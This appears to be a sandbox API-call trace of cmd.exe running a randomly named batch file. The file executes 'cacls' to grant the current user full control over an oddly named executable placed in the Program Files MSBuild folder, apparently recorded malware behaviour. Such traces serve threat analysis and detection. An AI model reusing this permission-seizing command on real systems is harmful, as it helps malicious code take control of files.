_wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0280.798] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0280.798] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0280.798] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0280.798] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0280.798] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0280.798] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0280.799] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0280.799] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0280.799] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0280.799] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0280.799] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0280.799] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0280.799] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0280.799] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0280.799] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0280.799] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0280.799] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0280.799] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0280.799] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0280.799] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0280.799] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0280.799] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0280.799] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0280.799] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0280.799] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0280.799] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0280.799] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0280.799] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0280.799] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0280.799] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0280.799] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0280.799] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0280.799] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0280.799] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0280.799] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0280.799] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0280.799] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0280.799] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0280.799] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0280.799] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0280.799] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0280.799] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0280.799] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0280.799] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0280.799] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0280.799] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0280.799] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0280.799] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0280.799] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0280.800] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0280.800] SetErrorMode (uMode=0x0) returned 0x0 [0280.800] SetErrorMode (uMode=0x1) returned 0x0 [0280.800] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x5105d0, lpFilePart=0x19f0cc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19f0cc*="Desktop") returned 0x1d [0280.800] SetErrorMode (uMode=0x0) returned 0x1 [0280.800] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0280.800] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.803] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.803] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x19ee78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ee78) returned 0x51b140 [0280.803] FindClose (in: hFindFile=0x51b140 | out: hFindFile=0x51b140) returned 1 [0280.803] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0280.803] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0280.803] GetConsoleTitleW (in: lpConsoleTitle=0x19f34c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.804] ApiSetQueryApiSetPresence () returned 0x0 [0280.804] ResolveDelayLoadedAPI () returned 0x745414a0 [0280.805] SaferWorker () returned 0x0 [0280.817] SetErrorMode (uMode=0x0) returned 0x0 [0280.817] SetErrorMode (uMode=0x1) returned 0x0 [0280.817] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0x51ad20, lpFilePart=0x19f1fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x19f1fc*="vRnqNMBW.bat") returned 0x2a [0280.817] SetErrorMode (uMode=0x0) returned 0x1 [0280.817] wcsspn (_String=" \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"", _Control=" \x09") returned 0x1 [0280.817] CmdBatNotificationStub () returned 0x1 [0280.817] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f28c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0280.817] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0280.817] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.817] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0280.817] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.818] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0280.818] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0xe2, lpOverlapped=0x0) returned 1 [0280.818] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0280.818] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0280.818] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.818] GetFileType (hFile=0xb4) returned 0x1 [0280.819] _get_osfhandle (_FileHandle=3) returned 0xb4 [0280.819] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0280.819] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0280.819] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0280.819] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0280.819] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0280.819] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0280.819] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0280.819] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0280.820] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0280.821] _tell (_FileHandle=3) returned 32 [0280.821] _close (_FileHandle=3) returned 0 [0280.822] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f020 | out: _Buffer="\r\n") returned 2 [0280.822] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.822] GetFileType (hFile=0x3c) returned 0x2 [0280.822] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.822] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eff8 | out: lpMode=0x19eff8) returned 1 [0280.822] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.822] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f010, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f010*=0x2) returned 1 [0280.822] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0280.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.823] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f01c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0280.823] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x19f01c | out: _Buffer=">") returned 1 [0280.823] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.823] GetFileType (hFile=0x3c) returned 0x2 [0280.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.823] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19effc | out: lpMode=0x19effc) returned 1 [0280.823] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.823] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19f014, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x19f014*=0x1e) returned 1 [0280.824] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.824] GetFileType (hFile=0x3c) returned 0x2 [0280.824] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.824] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f29c | out: lpMode=0x19f29c) returned 1 [0280.824] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.824] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x517910*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x19f2b4, lpReserved=0x0 | out: lpBuffer=0x517910*, lpNumberOfCharsWritten=0x19f2b4*=0x5) returned 1 [0280.825] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f2bc | out: _Buffer=" \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\" /E /G CIiHmnxMn6Ps:F /C ") returned 81 [0280.825] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.825] GetFileType (hFile=0x3c) returned 0x2 [0280.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.825] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0280.825] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.825] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x51, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x51) returned 1 [0280.825] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f2d0 | out: _Buffer="\r\n") returned 2 [0280.825] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.825] GetFileType (hFile=0x3c) returned 0x2 [0280.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.825] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f2a8 | out: lpMode=0x19f2a8) returned 1 [0280.826] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.826] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2c0*=0x2) returned 1 [0280.826] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.826] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.826] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.826] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.826] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.826] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.826] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.826] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.826] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.826] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.826] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.826] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.826] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.826] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.826] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.826] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.826] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.826] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.826] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.826] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.826] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.826] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.826] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.826] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.826] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.826] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.827] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.827] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.827] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.827] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.827] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.827] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.827] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.827] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.827] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.827] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.827] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.827] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.827] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.827] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.827] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.827] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.827] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0280.827] SetErrorMode (uMode=0x0) returned 0x0 [0280.827] SetErrorMode (uMode=0x1) returned 0x0 [0280.827] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51be90, lpFilePart=0x19f06c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19f06c*="Desktop") returned 0x1d [0280.827] SetErrorMode (uMode=0x0) returned 0x1 [0280.827] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.827] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.829] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.829] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0xffffffff [0280.829] GetLastError () returned 0x2 [0280.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.830] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0xffffffff [0280.830] GetLastError () returned 0x2 [0280.830] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.830] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0x510b68 [0280.830] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0280.830] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0xffffffff [0280.830] GetLastError () returned 0x2 [0280.830] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x19edf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19edf8) returned 0x510b68 [0280.830] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0280.830] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.830] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.830] GetConsoleTitleW (in: lpConsoleTitle=0x19ee40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.888] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.888] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.888] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.888] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.888] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.888] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.888] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.888] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.888] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.888] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.888] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.888] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.888] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.888] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.888] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.888] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.888] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.888] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.888] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.888] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.888] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.888] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.888] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.888] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.888] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.888] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.889] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.889] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.889] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.889] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.889] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.889] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.889] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.889] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.889] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.889] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.889] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.889] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.889] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.889] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.889] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.889] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.889] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.889] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.889] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.889] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.889] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.889] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.889] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.889] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.889] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.889] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.889] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.889] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.889] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.889] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.889] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.889] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.889] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.889] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.889] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.889] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.889] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.889] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.889] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.889] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.889] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.889] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.889] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.889] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.889] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.889] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.889] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.889] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.889] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.889] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.889] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.890] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.890] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.890] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.890] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.890] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.890] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.890] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.890] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0280.890] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0280.890] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0280.890] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0280.890] SetErrorMode (uMode=0x0) returned 0x0 [0280.890] SetErrorMode (uMode=0x1) returned 0x0 [0280.890] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51c508, lpFilePart=0x19e94c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19e94c*="Desktop") returned 0x1d [0280.890] SetErrorMode (uMode=0x0) returned 0x1 [0280.890] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.890] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.890] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.890] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.890] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0xffffffff [0280.891] GetLastError () returned 0x2 [0280.891] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.891] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0xffffffff [0280.891] GetLastError () returned 0x2 [0280.891] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.891] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0x510b68 [0280.891] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0280.891] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0xffffffff [0280.891] GetLastError () returned 0x2 [0280.891] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0x510b68 [0280.891] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0280.891] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.891] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.891] GetConsoleTitleW (in: lpConsoleTitle=0x19ebcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.903] InitializeProcThreadAttributeList (in: lpAttributeList=0x19eaf8, dwAttributeCount=0x1, 